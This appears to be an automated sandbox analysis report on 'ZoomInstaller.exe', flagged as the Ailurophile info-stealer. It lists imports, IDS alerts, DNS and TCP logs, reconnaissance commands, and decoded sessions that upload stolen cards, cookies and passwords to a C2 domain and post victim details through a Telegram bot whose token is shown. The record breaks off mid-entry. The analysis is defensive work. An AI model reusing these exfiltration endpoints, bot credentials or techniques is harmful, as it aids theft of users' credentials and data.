KERNEL32.dll | AddVectoredContinueHandler, AddVectoredExceptionHandler, AreFileApisANSI, CloseHandle, CreateEventA, CreateFileA, CreateFileMappingA, CreateFileMappingW, CreateFileW, CreateIoCompletionPort, CreateMutexW, CreateThread, CreateWaitableTimerA, CreateWaitableTimerExW, DeleteCriticalSection, DeleteFileA, DeleteFileW, DuplicateHandle, EnterCriticalSection, ExitProcess, FlushFileBuffers, FlushViewOfFile, FormatMessageA, FormatMessageW, FreeEnvironmentStringsW, FreeLibrary, GetConsoleMode, GetCurrentProcessId, GetCurrentThreadId, GetDiskFreeSpaceA, GetDiskFreeSpaceW, GetEnvironmentStringsW, GetErrorMode, GetFileAttributesA, GetFileAttributesExW, GetFileAttributesW, GetFileSize, GetFullPathNameA, GetFullPathNameW, GetLastError, GetProcAddress, GetProcessAffinityMask, GetProcessHeap, GetQueuedCompletionStatusEx, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetSystemTime, GetSystemTimeAsFileTime, GetTempPathA, GetTempPathW, GetThreadContext, GetTickCount, GetVersionExA, GetVersionExW, HeapAlloc, HeapCompact, HeapCreate, HeapDestroy, HeapFree, HeapReAlloc, HeapSize, HeapValidate, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, LoadLibraryA, LoadLibraryExW, LoadLibraryW, LocalFree, LockFile, LockFileEx, MapViewOfFile, MultiByteToWideChar, OutputDebugStringA, OutputDebugStringW, PostQueuedCompletionStatus, QueryPerformanceCounter, RaiseFailFastException, ReadFile, ResumeThread, RtlLookupFunctionEntry, RtlVirtualUnwind, SetConsoleCtrlHandler, SetEndOfFile, SetErrorMode, SetEvent, SetFilePointer, SetProcessPriorityBoost, SetThreadContext, SetUnhandledExceptionFilter, SetWaitableTimer, Sleep, SuspendThread, SwitchToThread, SystemTimeToFileTime, TlsAlloc, TlsGetValue, TryEnterCriticalSection, UnlockFile, UnlockFileEx, UnmapViewOfFile, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WaitForSingleObjectEx, WerGetFlags, WerSetFlags, WideCharToMultiByte, WriteConsoleW, WriteFile, __C_specific_handler
msvcrt.dll | ___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _beginthread, _beginthreadex, _cexit, _commode, _endthreadex, _errno, _fmode, _initterm, _localtime64, _lock, _unlock, abort, atexit, calloc, exit, fprintf, fputc, free, fwrite, localeconv, malloc, memchr, memcmp, memcpy, memmove, memset, qsort, realloc, signal, strchr, strcmp, strcspn, strerror, strlen, strncmp, strrchr, strspn, vfprintf, wcslen

Name | Ordinal | Address
_cgo_dummy_export | 1 | 0x1407a7fd0
authorizerTrampoline | 2 | 0x1402e64b0
callbackTrampoline | 3 | 0x1402e6210
commitHookTrampoline | 4 | 0x1402e63a0
compareTrampoline | 5 | 0x1402e6310
doneTrampoline | 6 | 0x1402e62d0
preUpdateHookTrampoline | 7 | 0x1402e6530
rollbackHookTrampoline | 8 | 0x1402e6400
stepTrampoline | 9 | 0x1402e6270
updateHookTrampoline | 10 | 0x1402e6440

Language of compilation system | Country where language is spoken | Map
English | United States

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-29T14:10:15.996082+0100 | 2057103 | ET MALWARE Win32/Ailurophile Stealer CnC Domain in DNS Lookup (manestvli .shop) | 1 | 192.168.2.6 | 54299 | 1.1.1.1 | 53 | UDP
2024-10-29T14:10:16.997721+0100 | 2057103 | ET MALWARE Win32/Ailurophile Stealer CnC Domain in DNS Lookup (manestvli .shop) | 1 | 192.168.2.6 | 54299 | 1.1.1.1 | 53 | UDP
2024-10-29T14:10:18.734692+0100 | 2057104 | ET MALWARE Observed Win32/Ailurophile Stealer Domain (manestvli .shop) in TLS SNI | 1 | 192.168.2.6 | 49970 | 188.114.97.3 | 443 | TCP

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 29, 2024 14:09:14.401094913 CET | 49709 | 443 | 192.168.2.6 | 104.26.9.59
Oct 29, 2024 14:09:14.401135921 CET | 443 | 49709 | 104.26.9.59 | 192.168.2.6
Oct 29, 2024 14:09:14.401263952 CET | 49709 | 443 | 192.168.2.6 | 104.26.9.59
Oct 29, 2024 14:09:14.402508020 CET | 49709 | 443 | 192.168.2.6 | 104.26.9.59
Oct 29, 2024 14:09:14.402523041 CET | 443 | 49709 | 104.26.9.59 | 192.168.2.6
Oct 29, 2024 14:09:15.124979973 CET | 443 | 49709 | 104.26.9.59 | 192.168.2.6
Oct 29, 2024 14:09:15.125287056 CET | 49709 | 443 | 192.168.2.6 | 104.26.9.59
Oct 29, 2024 14:09:15.125302076 CET | 443 | 49709 | 104.26.9.59 | 192.168.2.6
Oct 29, 2024 14:09:15.125514984 CET | 49709 | 443 | 192.168.2.6 | 104.26.9.59
Oct 29, 2024 14:09:15.125520945 CET | 443 | 49709 | 104.26.9.59 | 192.168.2.6
Oct 29, 2024 14:09:15.126673937 CET | 443 | 49709 | 104.26.9.59 | 192.168.2.6
Oct 29, 2024 14:09:15.126761913 CET | 49709 | 443 | 192.168.2.6 | 104.26.9.59
Oct 29, 2024 14:09:15.177923918 CET | 49709 | 443 | 192.168.2.6 | 104.26.9.59
Oct 29, 2024 14:09:15.178033113 CET | 443 | 49709 | 104.26.9.59 | 192.168.2.6
Oct 29, 2024 14:09:15.178119898 CET | 49709 | 443 | 192.168.2.6 | 104.26.9.59
Oct 29, 2024 14:09:15.219337940 CET | 443 | 49709 | 104.26.9.59 | 192.168.2.6
Oct 29, 2024 14:09:15.225816011 CET | 49709 | 443 | 192.168.2.6 | 104.26.9.59
Oct 29, 2024 14:09:15.225827932 CET | 443 | 49709 | 104.26.9.59 | 192.168.2.6
Oct 29, 2024 14:09:15.279331923 CET | 49709 | 443 | 192.168.2.6 | 104.26.9.59
Oct 29, 2024 14:09:15.365617037 CET | 443 | 49709 | 104.26.9.59 | 192.168.2.6
Oct 29, 2024 14:09:15.365710020 CET | 443 | 49709 | 104.26.9.59 | 192.168.2.6
Oct 29, 2024 14:09:15.365758896 CET | 49709 | 443 | 192.168.2.6 | 104.26.9.59
Oct 29, 2024 14:09:15.366204023 CET | 49709 | 443 | 192.168.2.6 | 104.26.9.59
Oct 29, 2024 14:09:15.366225958 CET | 443 | 49709 | 104.26.9.59 | 192.168.2.6
Oct 29, 2024 14:09:15.366282940 CET | 49709 | 443 | 192.168.2.6 | 104.26.9.59
Oct 29, 2024 14:09:15.366288900 CET | 443 | 49709 | 104.26.9.59 | 192.168.2.6
Oct 29, 2024 14:10:17.148538113 CET | 49970 | 443 | 192.168.2.6 | 188.114.97.3
Oct 29, 2024 14:10:17.148583889 CET | 443 | 49970 | 188.114.97.3 | 192.168.2.6
Oct 29, 2024 14:10:17.148694992 CET | 49970 | 443 | 192.168.2.6 | 188.114.97.3
Oct 29, 2024 14:10:17.149060011 CET | 49970 | 443 | 192.168.2.6 | 188.114.97.3
Oct 29, 2024 14:10:17.149075031 CET | 443 | 49970 | 188.114.97.3 | 192.168.2.6
Oct 29, 2024 14:10:18.734431982 CET | 443 | 49970 | 188.114.97.3 | 192.168.2.6
Oct 29, 2024 14:10:18.734692097 CET | 49970 | 443 | 192.168.2.6 | 188.114.97.3
Oct 29, 2024 14:10:18.734710932 CET | 443 | 49970 | 188.114.97.3 | 192.168.2.6
Oct 29, 2024 14:10:18.734834909 CET | 49970 | 443 | 192.168.2.6 | 188.114.97.3
Oct 29, 2024 14:10:18.734842062 CET | 443 | 49970 | 188.114.97.3 | 192.168.2.6
Oct 29, 2024 14:10:18.735889912 CET | 443 | 49970 | 188.114.97.3 | 192.168.2.6
Oct 29, 2024 14:10:18.735969067 CET | 49970 | 443 | 192.168.2.6 | 188.114.97.3
Oct 29, 2024 14:10:18.756350994 CET | 49970 | 443 | 192.168.2.6 | 188.114.97.3
Oct 29, 2024 14:10:18.756575108 CET | 49970 | 443 | 192.168.2.6 | 188.114.97.3
Oct 29, 2024 14:10:18.756576061 CET | 443 | 49970 | 188.114.97.3 | 192.168.2.6
Oct 29, 2024 14:10:18.756604910 CET | 49970 | 443 | 192.168.2.6 | 188.114.97.3
Oct 29, 2024 14:10:18.756647110 CET | 49970 | 443 | 192.168.2.6 | 188.114.97.3
Oct 29, 2024 14:10:18.756661892 CET | 443 | 49970 | 188.114.97.3 | 192.168.2.6
Oct 29, 2024 14:10:18.756680965 CET | 49970 | 443 | 192.168.2.6 | 188.114.97.3
Oct 29, 2024 14:10:18.799355984 CET | 443 | 49970 | 188.114.97.3 | 192.168.2.6
Oct 29, 2024 14:10:18.804900885 CET | 49970 | 443 | 192.168.2.6 | 188.114.97.3
Oct 29, 2024 14:10:19.408775091 CET | 443 | 49970 | 188.114.97.3 | 192.168.2.6
Oct 29, 2024 14:10:19.408910990 CET | 443 | 49970 | 188.114.97.3 | 192.168.2.6
Oct 29, 2024 14:10:19.408991098 CET | 49970 | 443 | 192.168.2.6 | 188.114.97.3
Oct 29, 2024 14:10:19.409240007 CET | 49970 | 443 | 192.168.2.6 | 188.114.97.3
Oct 29, 2024 14:10:19.409267902 CET | 443 | 49970 | 188.114.97.3 | 192.168.2.6
Oct 29, 2024 14:10:19.409287930 CET | 49970 | 443 | 192.168.2.6 | 188.114.97.3
Oct 29, 2024 14:10:19.409297943 CET | 443 | 49970 | 188.114.97.3 | 192.168.2.6
Oct 29, 2024 14:10:19.418932915 CET | 49980 | 443 | 192.168.2.6 | 149.154.167.220
Oct 29, 2024 14:10:19.419020891 CET | 443 | 49980 | 149.154.167.220 | 192.168.2.6
Oct 29, 2024 14:10:19.419105053 CET | 49980 | 443 | 192.168.2.6 | 149.154.167.220
Oct 29, 2024 14:10:19.419447899 CET | 49980 | 443 | 192.168.2.6 | 149.154.167.220
Oct 29, 2024 14:10:19.419467926 CET | 443 | 49980 | 149.154.167.220 | 192.168.2.6
Oct 29, 2024 14:10:20.453824997 CET | 443 | 49980 | 149.154.167.220 | 192.168.2.6
Oct 29, 2024 14:10:20.454055071 CET | 49980 | 443 | 192.168.2.6 | 149.154.167.220
Oct 29, 2024 14:10:20.454099894 CET | 443 | 49980 | 149.154.167.220 | 192.168.2.6
Oct 29, 2024 14:10:20.454171896 CET | 49980 | 443 | 192.168.2.6 | 149.154.167.220
Oct 29, 2024 14:10:20.454180002 CET | 443 | 49980 | 149.154.167.220 | 192.168.2.6
Oct 29, 2024 14:10:20.455213070 CET | 443 | 49980 | 149.154.167.220 | 192.168.2.6
Oct 29, 2024 14:10:20.455280066 CET | 49980 | 443 | 192.168.2.6 | 149.154.167.220
Oct 29, 2024 14:10:20.456088066 CET | 49980 | 443 | 192.168.2.6 | 149.154.167.220
Oct 29, 2024 14:10:20.456161976 CET | 443 | 49980 | 149.154.167.220 | 192.168.2.6
Oct 29, 2024 14:10:20.456269979 CET | 49980 | 443 | 192.168.2.6 | 149.154.167.220
Oct 29, 2024 14:10:20.456286907 CET | 443 | 49980 | 149.154.167.220 | 192.168.2.6
Oct 29, 2024 14:10:20.456310987 CET | 49980 | 443 | 192.168.2.6 | 149.154.167.220
Oct 29, 2024 14:10:20.499382973 CET | 443 | 49980 | 149.154.167.220 | 192.168.2.6
Oct 29, 2024 14:10:20.503779888 CET | 49980 | 443 | 192.168.2.6 | 149.154.167.220
Oct 29, 2024 14:10:20.734303951 CET | 443 | 49980 | 149.154.167.220 | 192.168.2.6
Oct 29, 2024 14:10:20.734328985 CET | 443 | 49980 | 149.154.167.220 | 192.168.2.6
Oct 29, 2024 14:10:20.734451056 CET | 49980 | 443 | 192.168.2.6 | 149.154.167.220
Oct 29, 2024 14:10:20.734491110 CET | 443 | 49980 | 149.154.167.220 | 192.168.2.6
Oct 29, 2024 14:10:20.734764099 CET | 49980 | 443 | 192.168.2.6 | 149.154.167.220
Oct 29, 2024 14:10:20.734791994 CET | 443 | 49980 | 149.154.167.220 | 192.168.2.6
Oct 29, 2024 14:10:20.734807014 CET | 49980 | 443 | 192.168.2.6 | 149.154.167.220
Oct 29, 2024 14:10:20.734982967 CET | 443 | 49980 | 149.154.167.220 | 192.168.2.6
Oct 29, 2024 14:10:20.735025883 CET | 443 | 49980 | 149.154.167.220 | 192.168.2.6
Oct 29, 2024 14:10:20.735035896 CET | 49980 | 443 | 192.168.2.6 | 149.154.167.220
Oct 29, 2024 14:10:20.735095024 CET | 49980 | 443 | 192.168.2.6 | 149.154.167.220

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 29, 2024 14:09:14.389560938 CET | 59140 | 53 | 192.168.2.6 | 1.1.1.1
Oct 29, 2024 14:09:14.397434950 CET | 53 | 59140 | 1.1.1.1 | 192.168.2.6
Oct 29, 2024 14:10:15.996082067 CET | 54299 | 53 | 192.168.2.6 | 1.1.1.1
Oct 29, 2024 14:10:16.997720957 CET | 54299 | 53 | 192.168.2.6 | 1.1.1.1
Oct 29, 2024 14:10:17.147002935 CET | 53 | 54299 | 1.1.1.1 | 192.168.2.6
Oct 29, 2024 14:10:17.150201082 CET | 53 | 54299 | 1.1.1.1 | 192.168.2.6
Oct 29, 2024 14:10:19.410284042 CET | 58360 | 53 | 192.168.2.6 | 1.1.1.1
Oct 29, 2024 14:10:19.417773008 CET | 53 | 58360 | 1.1.1.1 | 192.168.2.6

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 29, 2024 14:09:14.389560938 CET | 192.168.2.6 | 1.1.1.1 | 0x892b | Standard query (0) | api.myip.com | A (IP address) | IN (0x0001) | false
Oct 29, 2024 14:10:15.996082067 CET | 192.168.2.6 | 1.1.1.1 | 0x4eb4 | Standard query (0) | manestvli.shop | A (IP address) | IN (0x0001) | false
Oct 29, 2024 14:10:16.997720957 CET | 192.168.2.6 | 1.1.1.1 | 0x4eb4 | Standard query (0) | manestvli.shop | A (IP address) | IN (0x0001) | false
Oct 29, 2024 14:10:19.410284042 CET | 192.168.2.6 | 1.1.1.1 | 0xfceb | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 29, 2024 14:09:14.397434950 CET | 1.1.1.1 | 192.168.2.6 | 0x892b | No error (0) | api.myip.com | | 104.26.9.59 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 14:09:14.397434950 CET | 1.1.1.1 | 192.168.2.6 | 0x892b | No error (0) | api.myip.com | | 104.26.8.59 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 14:09:14.397434950 CET | 1.1.1.1 | 192.168.2.6 | 0x892b | No error (0) | api.myip.com | | 172.67.75.163 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 14:10:17.147002935 CET | 1.1.1.1 | 192.168.2.6 | 0x4eb4 | No error (0) | manestvli.shop | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 14:10:17.147002935 CET | 1.1.1.1 | 192.168.2.6 | 0x4eb4 | No error (0) | manestvli.shop | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 14:10:17.150201082 CET | 1.1.1.1 | 192.168.2.6 | 0x4eb4 | No error (0) | manestvli.shop | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 14:10:17.150201082 CET | 1.1.1.1 | 192.168.2.6 | 0x4eb4 | No error (0) | manestvli.shop | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 14:10:19.417773008 CET | 1.1.1.1 | 192.168.2.6 | 0xfceb | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false

• api.myip.com
• manestvli.shop
• api.telegram.org

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49709 | 104.26.9.59 | 443 | 5368 | C:\Users\user\Desktop\ZoomInstaller.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 13:09:15 UTC | 93 | OUT | GET / HTTP/1.1
Host: api.myip.com
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
2024-10-29 13:09:15 UTC | 567 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 13:09:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6DsXUbkQhLdQbSQg%2F43oGhlINsJGSaJ07uP8TdOq%2FPDSy%2Fevov9%2BoVq55IAIylnKOtGfB2EK5wFwQBspzJMKJJA14C8gc97hdDyaz9mjVi0ONXo3GifYYxTTi6LzZA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8da366224b993590-DFW
2024-10-29 13:09:15 UTC | 65 | IN | Data Raw: 33 62 0d 0a 7b 22 69 70 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 63 22 3a 22 55 53 22 7d 0d 0a
Data Ascii: 3b{"ip":"173.254.250.72","country":"United States","cc":"US"}
2024-10-29 13:09:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49970 | 188.114.97.3 | 443 | 5368 | C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-29 13:10:18 UTC810OUTPOST /upload.php?data=bDkyQVpaZGp1YXE2bU0raWZhUFJtWUNJaGQxN3phMmRsWGljcThhdG1KK1drTGVaZ3AxOTRJRGVqMlNEZGJDYXJxbXRwNWQ4cTJaOG5ubVpmOTFxcllLRnRLYXYwTGl1Z0tQRnFYeWRxOCtXcktLcmpvU3NaNnZSbEtlTmJLeW1sbVp0MDVhbmVJeVZpSmljeEpuSHNYMTlwNmQ4ZW5iZmxOMTNySUYwbDZpdTBLaHNnWDJ6WVh5ZHE4K1ZxM3l1bDJUSHA4WFR0YkY5bzlHWmdIZDkyWHZSaEtxV1k5ZWh2TDZ3b0lPaXE2bDhuYXZQaTd5TVpKWmp2YUhFcmR1eGZhUFJtWUNIZmRsNzBZU2NsNTYxcTZ2UTBxQ0JmS3VqZktHTzFwU3JqSzU5bTlLYXI2bXNxbjJtc0thWGkybVdsZEtobllPYXJZZkUwODluanBDemw0aG5oczZXcTR5dWZacmFtc2FZcWFxV2dMaGdmSjZqejMrM2Y2ZDluc3VoeFptMXJaZW56Wm1DblgzZGU5Sm1jUT09&hash=2d6441c1bfc749b0344f HTTP/1.1
                                                                                Host: manestvli.shop
                                                                                User-Agent: Go-http-client/1.1
                                                                                Content-Length: 3788
                                                                                Content-Type: multipart/form-data; boundary=2936f3dac7c8181cd97977433163a9cd10ed18c947a33702af6c7d74091c
                                                                                Accept-Encoding: gzip
                                                                                2024-10-29 13:10:18 UTC | 376 bytes | OUT | Data Ascii: --2936f3dac7c8181cd97977433163a9cd10ed18c947a33702af6c7d74091cContent-Disposition: form-data; name="file"; filename="Ailurophile.zip"Content-Type: application/octet-streamPKAilurophile/PKAilu
                                                                                2024-10-29 13:10:18 UTC | 2372 bytes | OUT | Data Ascii: XZS__XSPKGSVPKAilurophile\Cards/PKAilurophile\Cards\Cards.txtr)-/IU.IMI-RUIIM/JRp@RPXR_PK@`;>PK
                                                                                2024-10-29 13:10:18 UTC | 538 bytes | OUT | Data Ascii: Ailurophile\Cards/PK@`;>2Ailurophile\Cards\Cards.txtPKAilurophile\Cookies/PKAC&Ailurophile\Cookies\Google_De
                                                                                2024-10-29 13:10:18 UTC | 502 bytes | OUT | Data Ascii: Ailurophile\Passwords/PKVo>A(Ailurophile\Passwords\Google-Default.txtPKVo>A+bAilurophile\Passwords\Microsoft-Default.txtPKAil
                                                                                2024-10-29 13:10:19 UTC | 797 bytes | IN | HTTP/1.1 200 OK
                                                                                Date: Tue, 29 Oct 2024 13:10:19 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                X-Powered-By: PHP/8.0.30
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NPpJhjrasbABXXRgFbTnhUrJwJQ8kaRceba3Q%2B2KCFLj6jVJoDckxUcFqF%2FEOVdkKsZyt9UO%2FmRJaMGBhUxYyPhN3L%2FBUEBt8sNub1pio30Rg3rp55olBWi4AcCs%2FLxmaA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8da367afa973e7aa-DFW
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1137&sent=6&recv=10&lost=0&retrans=0&sent_bytes=2834&recv_bytes=5301&delivery_rate=2500863&cwnd=249&unsent_bytes=0&cid=96264c290712b47d&ts=1658&x=0"
                                                                                2024-10-29 13:10:19 UTC | 572 bytes | IN | Data Ascii: 2e0<br /><b>Warning</b>: file_put_contents(herasvnxailurophile/Ailurophile_6720debb386765.80672486.zip/log.txt): Failed to open stream: No such file or directory in <b>C:\xampp\htdocs\upload.php</b> on line <b>42</b><br /><br /><b>Warning</b>: file
                                                                                2024-10-29 13:10:19 UTC | 171 bytes | IN | Data Ascii: pen stream: No such file or directory in <b>C:\xampp\htdocs\upload.php</b> on line <b>42</b><br />{"status":"success","message":"File uploaded and saved successfully."}
                                                                                2024-10-29 13:10:19 UTC | 5 bytes | IN | Data Ascii: 0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                2 | 192.168.2.6 | 49980 | 149.154.167.220 | 443 | 5368 | C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-29 13:10:20 UTC | 230 bytes | OUT | POST /bot7576282251:AAG0mg-rIFL8SDgfm15Nk4l51UZeLB-cEwU/sendMessage HTTP/1.1
                                                                                Host: api.telegram.org
                                                                                User-Agent: Go-http-client/1.1
                                                                                Content-Length: 1732
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Accept-Encoding: gzip
                                                                                2024-10-29 13:10:20 UTC | 956 bytes | OUT | Data Ascii: chat_id=6843212514&parse_mode=HTML&text=%0A%F0%9F%8C%90+%3Cb%3EIP%3A%3C%2Fb%3E+173.254.250.72%0A%F0%9F%8F%B3+%3Cb%3ECountry%3A%3C%2Fb%3E+United+States%0A%F0%9F%92%BB+%3Cb%3EHostname%3A%3C%2Fb%3E+376483%0A%F0%9F%96%A5+%3Cb%3EPC+Type%3A%3C%2Fb%3E+Microsoft+
                                                                                2024-10-29 13:10:20 UTC | 776 bytes | OUT | Data Ascii: mo+compte+token+backup+secret+seed+mnemonic+memoric+private+key+passphrase+pass+phrase+steal+bank+info+casino+prv+priv%C3%A9+prive+telegram+identifiant+identifiants+personnel+trading+bitcoin+sauvegarde+funds+recup+note%5D%0A%0A%F0%9F%94%8D+%3Cb%3EFound+1+
                                                                                2024-10-29 13:10:20 UTC | 389 bytes | IN | HTTP/1.1 200 OK
                                                                                Server: nginx/1.18.0
                                                                                Date: Tue, 29 Oct 2024 13:10:20 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 2330
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2024-10-29 13:10:20 UTC | 2330 bytes | IN | Data Ascii: {"ok":true,"result":{"message_id":79,"from":{"id":7576282251,"is_bot":true,"first_name":"chatbot355","username":"frwegwebot"},"chat":{"id":6843212514,"first_name":"x1","username":"real_x1","type":"private"},"date":1730207420,"text":"\ud83c\udf10 IP: 173.2


                                                                                Target ID:0
                                                                                Start time:09:09:13
                                                                                Start date:29/10/2024
                                                                                Path:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\Desktop\ZoomInstaller.exe"
                                                                                Imagebase:0x7ff6c39a0000
                                                                                File size:22'207'488 bytes
                                                                                MD5 hash:806A6CCCE380785FAA45512CE603C580
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:2
                                                                                Start time:09:09:14
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:wmic path win32_videocontroller get caption
                                                                                Imagebase:0x7ff6db670000
                                                                                File size:576'000 bytes
                                                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                Target ID:3
                                                                                Start time:09:09:14
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:4
                                                                                Start time:09:09:15
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:tasklist
                                                                                Imagebase:0x7ff7a9600000
                                                                                File size:106'496 bytes
                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                Target ID:5
                                                                                Start time:09:09:15
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:6
                                                                                Start time:09:09:16
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:wmic os get Caption
                                                                                Imagebase:0x7ff6db670000
                                                                                File size:576'000 bytes
                                                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                Target ID:7
                                                                                Start time:09:09:16
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:8
                                                                                Start time:09:09:17
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:wmic os get Version
                                                                                Imagebase:0x7ff6db670000
                                                                                File size:576'000 bytes
                                                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                Target ID:9
                                                                                Start time:09:09:17
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:10
                                                                                Start time:09:09:18
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion"
                                                                                Imagebase:0x7ff6e3d50000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:11
                                                                                Start time:09:09:18
